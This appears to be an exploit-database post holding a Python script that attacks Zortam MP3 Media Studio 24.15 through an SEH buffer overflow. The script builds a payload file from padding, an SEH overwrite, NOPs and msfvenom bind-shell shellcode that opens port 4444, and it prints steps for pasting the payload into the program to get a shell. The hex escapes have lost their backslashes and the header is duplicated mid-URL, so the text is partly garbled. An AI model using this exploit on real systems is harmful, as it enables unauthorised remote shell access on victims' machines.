Category: Vulnerabilities
Hits: 460
#Exploit Title: Zortam MP3 Media Studio Version 24.15 Exploit (SEH)
#Version: 24.15
#Exploit Author: Manpreet Singh Kheberi
#Date: December 13 2018
#Download Link: https://www.zo #Exploit Title: Zortam MP3 Media Studio Version 24.15 Exploit (SEH)
#Version: 24.15
#Exploit Author: Manpreet Singh Kheberi
#Date: December 13 2018
#Download Link: https://www.zortam.com/download.html
#Vendor Homepage: https://www.zortam.com
#Tested on: Windows Xp Sp3 x64
#Type: Bind shell
print "-----------------------------------------------------------------------------------------------------------------------"
print " Zortam MP3 media studio Exploit (SEH) "
print " by Manpreet Singh Kheberi "
print "Generated File zortam-exploit.txt "
print "INSTRUCTIONS:"
print "Go to File > New mp3 Library > Yes > Paste the payload in select textfield > click ok > You have a shell on port 4444 "
print "-----------------------------------------------------------------------------------------------------------------------"


filename = "zortam-exploit.txt"
junk = "x41"*268
nseh="x90x90xebx12"

seh ="x8ex32xb5x02"

nop="x90"*19
brk="x90x90x90x90"

# bind shell generated using metasploit
#msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python
# This will open a bind shell on port 4444
# use ncat Target-IP 4444

buf = ""
buf += "xdaxdfxbdxb7x95xd2xc2xd9x74x24xf4x5bx33"
buf += "xc9xb1x53x83xebxfcx31x6bx13x03xdcx86x30"
buf += "x37xdex41x36xb8x1ex92x57x30xfbxa3x57x26"
buf += "x88x94x67x2cxdcx18x03x60xf4xabx61xadxfb"
buf += "x1cxcfx8bx32x9cx7cxefx55x1ex7fx3cxb5x1f"
buf += "xb0x31xb4x58xadxb8xe4x31xb9x6fx18x35xf7"
buf += "xb3x93x05x19xb4x40xddx18x95xd7x55x43x35"
buf += "xd6xbaxffx7cxc0xdfx3ax36x7bx2bxb0xc9xad"
buf += "x65x39x65x90x49xc8x77xd5x6ex33x02x2fx8d"
buf += "xcex15xf4xefx14x93xeex48xdex03xcax69x33"
buf += "xd5x99x66xf8x91xc5x6axffx76x7ex96x74x79"
buf += "x50x1excex5ex74x7ax94xffx2dx26x7bxffx2d"
buf += "x89x24xa5x26x24x30xd4x65x21xf5xd5x95xb1"
buf += "x91x6exe6x83x3exc5x60xa8xb7xc3x77xcfxed"
buf += "xb4xe7x2ex0exc5x2exf5x5ax95x58xdcxe2x7e"
buf += "x98xe1x36xeax90x44xe9x09x5dx36x59x8excd"
buf += "xdfxb3x01x32xffxbbxcbx5bx68x46xf4x72x35"
buf += "xcfx12x1exd5x99x8dxb6x17xfex05x21x67xd4"
buf += "x3dxc5x20x3exf9xeaxb0x14xadx7cx3bx7bx69"
buf += "x9dx3cx56xd9xcaxabx2cx88xb9x4ax30x81x29"
buf += "xeexa3x4exa9x79xd8xd8xfex2ex2ex11x6axc3"
buf += "x09x8bx88x1excfxf4x08xc5x2cxfax91x88x09"
buf += "xd8x81x54x91x64xf5x08xc4x32xa3xeexbexf4"
buf += "x1dxb9x6dx5fxc9x3cx5ex60x8fx40x8bx16x6f"
buf += "xf0x62x6fx90x3dxe3x67xe9x23x93x88x20xe0"
buf += "xa3xc2x68x41x2cx8bxf9xd3x31x2cxd4x10x4c"
buf += "xafxdcxe8xabxafx95xedxf0x77x46x9cx69x12"
buf += "x68x33x89x37"

#boom+= "xCCxCCxCCxCC"
#calc.exe


# Used for initial exploit development phase
bchar = "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10"
bchar += "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
bchar +="x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"
bchar +="x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
bchar +="x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"
bchar +="x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
bchar +="x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"
bchar +="x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
bchar +="x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"
bchar +="x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
bchar +="xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"
bchar +="xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
bchar +="xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"
bchar +="xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
bchar +="xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"
bchar +="xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"



exploit = junk+nseh+seh+nop+brk+buf
textfile = open(filename,"w")
textfile.write(exploit)
textfile.close()